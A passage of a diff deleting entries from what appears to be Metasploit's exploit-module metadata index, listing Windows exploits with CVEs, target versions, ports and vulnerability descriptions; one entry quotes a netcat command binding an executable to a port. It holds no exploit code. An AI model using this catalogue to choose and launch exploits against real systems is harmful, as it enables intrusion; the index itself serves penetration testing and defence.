Express 5.3.6.2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb", - "is_install_path": true, - "ref_name": "windows/misc/ibm_tsm_rca_dicugetidentify", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ibm_websphere_java_deserialize": { - "name": "IBM WebSphere RCE Java Deserialization Vulnerability", - "fullname": "exploit/windows/misc/ibm_websphere_java_deserialize", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-11-06", - "type": "exploit", - "author": [ - "Liatsis Fotios " - ], - "description": "This module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization\n call of unauthenticated Java objects exists to the Apache Commons Collections (ACC) library, which allows\n remote arbitrary code execution. Authentication is not required in order to exploit this vulnerability.", - "references": [ - "CVE-2015-7450", - "URL-https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java", - "URL-http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability", - "URL-https://www.tenable.com/plugins/index.php?view=single&id=87171" - ], - "platform": "Windows", - "arch": "", - "rport": "8880", - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "IBM WebSphere 7.0.0.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ibm_websphere_java_deserialize.rb", - "is_install_path": true, - "ref_name": "windows/misc/ibm_websphere_java_deserialize", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/itunes_extm3u_bof": { - "name": "Apple iTunes 10 Extended M3U Stack Buffer Overflow", - "fullname": "exploit/windows/misc/itunes_extm3u_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-06-21", - "type": "exploit", - "author": [ - "Rh0 ", - "sinn3r " - ], - "description": "This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7.\n When opening an extended .m3u file containing an \"#EXTINF:\" tag description,\n iTunes will copy the content after \"#EXTINF:\" without appropriate checking\n from a heap buffer to a stack buffer, writing beyond the stack buffer's boundary,\n which allows code execution under the context of the user.\n\n Please note before using this exploit, you must have precise knowledge of the\n victim machine's QuickTime version (if installed), and then select your target\n accordingly.\n\n In addition, even though this exploit can be used as remote, you should be aware\n the victim's browser behavior when opening an itms link. For example,\n IE/Firefox/Opera by default will ask the user for permission before launching the\n itms link by iTunes. Chrome will ask for permission, but also spits a warning.\n Safari would be an ideal target, because it will open the link without any\n user interaction.", - "references": [ - "OSVDB-83220", - "EDB-19322", - "URL-http://pastehtml.com/view/c25uhk4ab.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3", - "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3", - "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3", - "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/itunes_extm3u_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/itunes_extm3u_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ivanti_agent_portal_cmdexec": { - "name": "Ivanti EPM Agent Portal Command Execution", - "fullname": "exploit/windows/misc/ivanti_agent_portal_cmdexec", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-06-07", - "type": "exploit", - "author": [ - "James Horseman", - "Zach Hanley", - "Spencer McIntyre" - ], - "description": "This module leverages an unauthenticated RCE in Ivanti's EPM Agent Portal where a RPC client can invoke a method\n which will run an attacker-specified string on the remote target as NT AUTHORITY\\SYSTEM.\n This vulnerability is present in versions prior to EPM 2021.1 Su4 and EPM 2022 Su2.", - "references": [ - "CVE-2023-28324", - "URL-https://forums.ivanti.com/s/article/SA-2023-06-06-CVE-2023-28324?language=en_US", - "URL-https://github.com/horizon3ai/CVE-2023-28324" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2024-11-20 13:51:39 +0000", - "path": "/modules/exploits/windows/misc/ivanti_agent_portal_cmdexec.rb", - "is_install_path": true, - "ref_name": "windows/misc/ivanti_agent_portal_cmdexec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ivanti_avalanche_mdm_bof": { - "name": "Ivanti Avalanche MDM Buffer Overflow", - "fullname": "exploit/windows/misc/ivanti_avalanche_mdm_bof", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-08-14", - "type": "exploit", - "author": [ - "Ege BALCI egebalci ", - "A researcher at Tenable" - ], - "description": "This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before v6.4.1.\n An attacker can send a specially crafted message to the Wavelink Avalanche Manager,\n which could result in arbitrary code execution with the NT/AUTHORITY SYSTEM permissions.\n This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.\n The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.\n Upon successful exploitation the attacker gains full access to the target system.\n\n This vulnerability has been tested against Ivanti Avalanche MDM v6.4.0.0 on Windows 10.", - "references": [ - "CVE-2023-32560", - "URL-https://www.tenable.com/security/research/tra-2023-27", - "URL-https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1" - ], - "platform": "Windows", - "arch": "x86", - "rport": 1777, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Ivanti Avalanche <= v6.4.0.0" - ], - "mod_time": "2023-09-04 16:46:14 +0000", - "path": "/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/ivanti_avalanche_mdm_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/landesk_aolnsrvr": { - "name": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow", - "fullname": "exploit/windows/misc/landesk_aolnsrvr", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-04-13", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending\n an overly long string to the Alert Service, a buffer is overwritten and arbitrary\n code can be executed.", - "references": [ - "CVE-2007-1674", - "OSVDB-34964", - "URL-http://www.tippingpoint.com/security/advisories/TSRT-07-04.html" - ], - "platform": "Windows", - "arch": "", - "rport": 65535, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Alerting Proxy 2000/2003/XP", - "Alerting Proxy 2003 SP1-2 (NX support)", - "Alerting Proxy XP SP2 (NX support)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/landesk_aolnsrvr.rb", - "is_install_path": true, - "ref_name": "windows/misc/landesk_aolnsrvr", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/lianja_db_net": { - "name": "Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow", - "fullname": "exploit/windows/misc/lianja_db_net", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-05-22", - "type": "exploit", - "author": [ - "Spencer McIntyre" - ], - "description": "This module exploits a stack buffer overflow in the db_netserver process, which\n is spawned by the Lianja SQL server. The issue is fixed in Lianja SQL 1.0.0RC5.2.", - "references": [ - "CVE-2013-3563", - "OSVDB-93759" - ], - "platform": "Windows", - "arch": "x86", - "rport": 8001, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Lianja SQL 1.0.0RC5.1 / Windows Server 2003 SP1-SP2", - "Lianja SQL 1.0.0RC5.1 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/lianja_db_net.rb", - "is_install_path": true, - "ref_name": "windows/misc/lianja_db_net", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-restarts" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/manageengine_eventlog_analyzer_rce": { - "name": "ManageEngine EventLog Analyzer Remote Code Execution", - "fullname": "exploit/windows/misc/manageengine_eventlog_analyzer_rce", - "aliases": [], - "rank": 0, - "disclosure_date": "2015-07-11", - "type": "exploit", - "author": [ - "xistence " - ], - "description": "This module exploits a SQL query functionality in ManageEngine EventLog Analyzer v10.6\n build 10060 and previous versions. Every authenticated user, including the default \"guest\"\n account can execute SQL queries directly on the underlying Postgres database server. The\n queries are executed as the \"postgres\" user which has full privileges and thus is able to\n write files to disk. This way a JSP payload can be uploaded and executed with SYSTEM\n privileges on the web server. This module has been tested successfully on ManageEngine\n EventLog Analyzer 10.0 (build 10003) over Windows 7 SP1.", - "references": [ - "EDB-38173", - "CVE-2015-7387", - "URL-https://seclists.org/fulldisclosure/2015/Sep/59" - ], - "platform": "Windows", - "arch": "x86", - "rport": 8400, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "ManageEngine EventLog Analyzer 10.0 (build 10003) / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/manageengine_eventlog_analyzer_rce", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/mercury_phonebook": { - "name": "Mercury/32 PH Server Module Buffer Overflow", - "fullname": "exploit/windows/misc/mercury_phonebook", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-12-19", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack-based buffer overflow in\n Mercury/32 <= v4.01b PH Server Module. This issue is\n due to a failure of the application to properly bounds check\n user-supplied data prior to copying it to a fixed size memory buffer.", - "references": [ - "CVE-2005-4411", - "OSVDB-22103", - "BID-16396" - ], - "platform": "Windows", - "arch": "", - "rport": 105, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Pro SP0/SP1 English", - "Windows 2000 Pro English ALL" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/mercury_phonebook.rb", - "is_install_path": true, - "ref_name": "windows/misc/mercury_phonebook", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/mini_stream": { - "name": "Mini-Stream 3.0.1.1 Buffer Overflow", - "fullname": "exploit/windows/misc/mini_stream", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-12-25", - "type": "exploit", - "author": [ - "Unknown", - "Ron Henry " - ], - "description": "This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1\n By creating a specially crafted pls file, an attacker may be able\n to execute arbitrary code.", - "references": [ - "CVE-2009-5109", - "OSVDB-61341", - "EDB-10745" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 ENG", - "Windows XP SP2 ENG" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/mini_stream.rb", - "is_install_path": true, - "ref_name": "windows/misc/mini_stream", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/mirc_privmsg_server": { - "name": "mIRC PRIVMSG Handling Stack Buffer Overflow", - "fullname": "exploit/windows/misc/mirc_privmsg_server", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-10-02", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier.\n By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG\n command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads\n may be necessary. This module is based on the code by SkD.", - "references": [ - "CVE-2008-4449", - "OSVDB-48752", - "BID-31552", - "EDB-6666" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/mirc_privmsg_server.rb", - "is_install_path": true, - "ref_name": "windows/misc/mirc_privmsg_server", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/mobile_mouse_rce": { - "name": "Mobile Mouse RCE", - "fullname": "exploit/windows/misc/mobile_mouse_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-09-20", - "type": "exploit", - "author": [ - "h00die", - "CHOKRI HAMMEDI" - ], - "description": "This module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol\n to deploy a payload and run it from the server. This module will only deploy\n a payload if the server is set without a password (default).\n Tested against 3.6.0.4, current at the time of module writing", - "references": [ - "EDB-51010", - "URL-https://mobilemouse.com/" - ], - "platform": "Windows", - "arch": "x64, x86", - "rport": 9099, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "default" - ], - "mod_time": "2022-09-27 14:51:03 +0000", - "path": "/modules/exploits/windows/misc/mobile_mouse_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/mobile_mouse_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/ms07_064_sami": { - "name": "MS07-064 Microsoft DirectX DirectShow SAMI Buffer Overflow", - "fullname": "exploit/windows/misc/ms07_064_sami", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-12-11", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the DirectShow Synchronized\n Accessible Media Interchanged (SAMI) parser in quartz.dll. This module\n has only been tested with Windows Media Player (6.4.09.1129) and\n DirectX 8.0.", - "references": [ - "CVE-2007-3901", - "OSVDB-39126", - "MSB-MS07-064", - "BID-26789" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ms07_064_sami.rb", - "is_install_path": true, - "ref_name": "windows/misc/ms07_064_sami", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ms10_104_sharepoint": { - "name": "MS10-104 Microsoft Office SharePoint Server 2007 Remote Code Execution", - "fullname": "exploit/windows/misc/ms10_104_sharepoint", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-12-14", - "type": "exploit", - "author": [ - "Oleksandr Mirosh", - "James Burton", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in SharePoint Server 2007 SP2. The\n software contains a directory traversal, that allows a remote attacker to write\n arbitrary files to the filesystem, sending a specially crafted SOAP ConvertFile\n request to the Office Document Conversions Launcher Service, which results in code\n execution under the context of 'SYSTEM'.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of SharePoint on Windows 2003 Servers.\n It has been successfully tested on Office SharePoint Server 2007 SP2 over Windows\n 2003 SP2.", - "references": [ - "CVE-2010-3964", - "OSVDB-69817", - "BID-45264", - "MSB-MS10-104", - "ZDI-10-287" - ], - "platform": "Windows", - "arch": "", - "rport": 8082, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Microsoft Office SharePoint Server 2007 SP2 / Microsoft Windows Server 2003 SP2" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/misc/ms10_104_sharepoint.rb", - "is_install_path": true, - "ref_name": "windows/misc/ms10_104_sharepoint", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/netcat110_nt": { - "name": "Netcat v1.10 NT Stack Buffer Overflow", - "fullname": "exploit/windows/misc/netcat110_nt", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-12-27", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in Netcat v1.10 NT. By sending\n an overly long string we are able to overwrite SEH. The vulnerability\n exists when netcat is used to bind (-e) an executable to a port in doexec.c.\n This module tested successfully using \"c:\\>nc -L -p 31337 -e ftp\".", - "references": [ - "CVE-2004-1317", - "OSVDB-12612", - "BID-12106", - "EDB-726" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal nc.exe" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/netcat110_nt.rb", - "is_install_path": true, - "ref_name": "windows/misc/netcat110_nt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/nettransport": { - "name": "NetTransport Download Manager 2.90.510 Buffer Overflow", - "fullname": "exploit/windows/misc/nettransport", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-01-02", - "type": "exploit", - "author": [ - "Lincoln", - "dookie" - ], - "description": "This exploits a stack buffer overflow in NetTransport Download Manager,\n part of the NetXfer suite. This module was tested\n successfully against version 2.90.510.", - "references": [ - "CVE-2017-17968", - "OSVDB-61435", - "EDB-10911" - ], - "platform": "Windows", - "arch": "", - "rport": 22222, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/nettransport.rb", - "is_install_path": true, - "ref_name": "windows/misc/nettransport", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/nvidia_mental_ray": { - "name": "Nvidia Mental Ray Satellite Service Arbitrary DLL Injection", - "fullname": "exploit/windows/misc/nvidia_mental_ray", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-12-10", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "Donato Ferrante", - "Ben Campbell " - ], - "description": "The Nvidia Mental Ray Satellite Service listens for control commands on port 7414.\n When it receives the command to load a DLL (via an UNC path) it will try to\n connect back to the host on port 7514. If a TCP connection is successful it will\n then attempt to load the DLL. This module has been tested successfully on Win7 x64\n with Nvidia Mental Ray Satellite Service v3.11.1.", - "references": [ - "URL-http://revuln.com/files/ReVuln_NVIDIA_mental_ray.pdf", - "OSVDB-100827" - ], - "platform": "Windows", - "arch": "", - "rport": 7414, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/nvidia_mental_ray.rb", - "is_install_path": true, - "ref_name": "windows/misc/nvidia_mental_ray", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/plugx": { - "name": "PlugX Controller Stack Buffer Overflow", - "fullname": "exploit/windows/misc/plugx", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-07-27", - "type": "exploit", - "author": [ - "Professor Plum" - ], - "description": "This module exploits a stack buffer overflow in the PlugX Controller (C2 server).", - "references": [], - "platform": "Windows", - "arch": "", - "rport": 13579, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "PlugX Type I (old)", - "PlugX Type I", - "PlugX Type II" - ], - "mod_time": "2023-07-14 12:46:26 +0000", - "path": "/modules/exploits/windows/misc/plugx.rb", - "is_install_path": true, - "ref_name": "windows/misc/plugx", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/poisonivy_21x_bof": { - "name": "Poison Ivy 2.1.x C2 Buffer Overflow", - "fullname": "exploit/windows/misc/poisonivy_21x_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-06-03", - "type": "exploit", - "author": [ - "Jos Wetzels" - ], - "description": "This module exploits a stack buffer overflow in the Poison Ivy 2.1.x C&C server.\n The exploit does not need to know the password chosen for the bot/server communication.", - "references": [ - "URL-http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware" - ], - "platform": "Windows", - "arch": "", - "rport": 3460, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Poison Ivy 2.1.4 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/poisonivy_21x_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/poisonivy_21x_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/poisonivy_bof": { - "name": "Poison Ivy Server Buffer Overflow", - "fullname": "exploit/windows/misc/poisonivy_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-06-24", - "type": "exploit", - "author": [ - "Andrzej Dereszowski", - "Gal Badishi", - "juan vazquez ", - "Jos Wetzels" - ], - "description": "This module exploits a stack buffer overflow in the Poison Ivy 2.2.0 to 2.3.2 C&C server.\n The exploit does not need to know the password chosen for the bot/server communication.", - "references": [ - "OSVDB-83774", - "EDB-19613", - "URL-http://www.signal11.eu/en/research/articles/targeted_2010.pdf", - "URL-http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/" - ], - "platform": "Windows", - "arch": "", - "rport": 3460, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1", - "Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1", - "Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/poisonivy_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/poisonivy_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/poppeeper_date": { - "name": "POP Peeper v3.4 DATE Buffer Overflow", - "fullname": "exploit/windows/misc/poppeeper_date", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-02-27", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in POP Peeper v3.4.\n When a specially crafted DATE string is sent to a client,\n an attacker may be able to execute arbitrary code. This\n module is based off of krakowlabs code.", - "references": [ - "CVE-2009-1029", - "OSVDB-53560", - "BID-34093" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "POP Peeper v3.4" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/poppeeper_date.rb", - "is_install_path": true, - "ref_name": "windows/misc/poppeeper_date", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/poppeeper_uidl": { - "name": "POP Peeper v3.4 UIDL Buffer Overflow", - "fullname": "exploit/windows/misc/poppeeper_uidl", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-02-27", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in POP Peeper v3.4.\n When a specially crafted UIDL string is sent to a client,\n an attacker may be able to execute arbitrary code. This\n module is based off of krakowlabs code.", - "references": [ - "OSVDB-53559", - "CVE-2009-1029", - "BID-33926" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "POP Peeper v3.4" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/poppeeper_uidl.rb", - "is_install_path": true, - "ref_name": "windows/misc/poppeeper_uidl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/realtek_playlist": { - "name": "Realtek Media Player Playlist Buffer Overflow", - "fullname": "exploit/windows/misc/realtek_playlist", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-12-16", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Realtek Media Player(RtlRack) A4.06.\n When a Realtek Media Player client opens a specially crafted playlist, an\n attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-5664", - "OSVDB-50715", - "BID-32860" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Realtek Media Player(RtlRack) A4.06 (XP Pro All English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/realtek_playlist.rb", - "is_install_path": true, - "ref_name": "windows/misc/realtek_playlist", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/remote_control_collection_rce": { - "name": "Remote Control Collection RCE", - "fullname": "exploit/windows/misc/remote_control_collection_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-09-20", - "type": "exploit", - "author": [ - "h00die", - "H4rk3nz0" - ], - "description": "This module utilizes the Remote Control Server's, part\n of the Remote Control Collection by Steppschuh, protocol\n to deploy a payload and run it from the server. This module will only deploy\n a payload if the server is set without a password (default).\n Tested against 3.1.1.12, current at the time of module writing", - "references": [ - "URL-http://remote-control-collection.com", - "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py" - ], - "platform": "Windows", - "arch": "x64, x86", - "rport": 1926, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "default" - ], - "mod_time": "2022-10-28 15:03:39 +0000", - "path": "/modules/exploits/windows/misc/remote_control_collection_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/remote_control_collection_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/remote_mouse_rce": { - "name": "Remote Mouse RCE", - "fullname": "exploit/windows/misc/remote_mouse_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-04-15", - "type": "exploit", - "author": [ - "h00die", - "0RPHON", - "H4rk3nz0" - ], - "description": "This module utilizes the Remote Mouse Server by Emote Interactive protocol\n to deploy a payload and run it from the server on versions < 4.200 (500 server response).\n This module will only deploy\n a payload if the server is set without a password (default).\n Tested against 4.110, current at the time of module writing", - "references": [ - "EDB-46697", - "CVE-2022-3365", - "URL-https://www.remotemouse.net/", - "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20mouse/remote-mouse-rce.py" - ], - "platform": "Windows", - "arch": "x64, x86", - "rport": 1978, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "default" - ], - "mod_time": "2022-10-17 15:30:17 +0000", - "path": "/modules/exploits/windows/misc/remote_mouse_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/remote_mouse_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/sap_2005_license": { - "name": "SAP Business One License Manager 2005 Buffer Overflow", - "fullname": "exploit/windows/misc/sap_2005_license", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-08-01", - "type": "exploit", - "author": [ - "Jacopo Cervini" - ], - "description": "This module exploits a stack buffer overflow in the SAP Business One 2005\n License Manager 'NT Naming Service' A and B releases. By sending an\n excessively long string the stack is overwritten enabling arbitrary\n code execution.", - "references": [ - "OSVDB-56837", - "CVE-2009-4988", - "BID-35933", - "EDB-9319" - ], - "platform": "Windows", - "arch": "", - "rport": 30000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Sap Business One 2005 B1 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/sap_2005_license.rb", - "is_install_path": true, - "ref_name": "windows/misc/sap_2005_license", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/sap_netweaver_dispatcher": { - "name": "SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow", - "fullname": "exploit/windows/misc/sap_netweaver_dispatcher", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-05-08", - "type": "exploit", - "author": [ - "Martin Gallo", - "juan vazquez " - ], - "description": 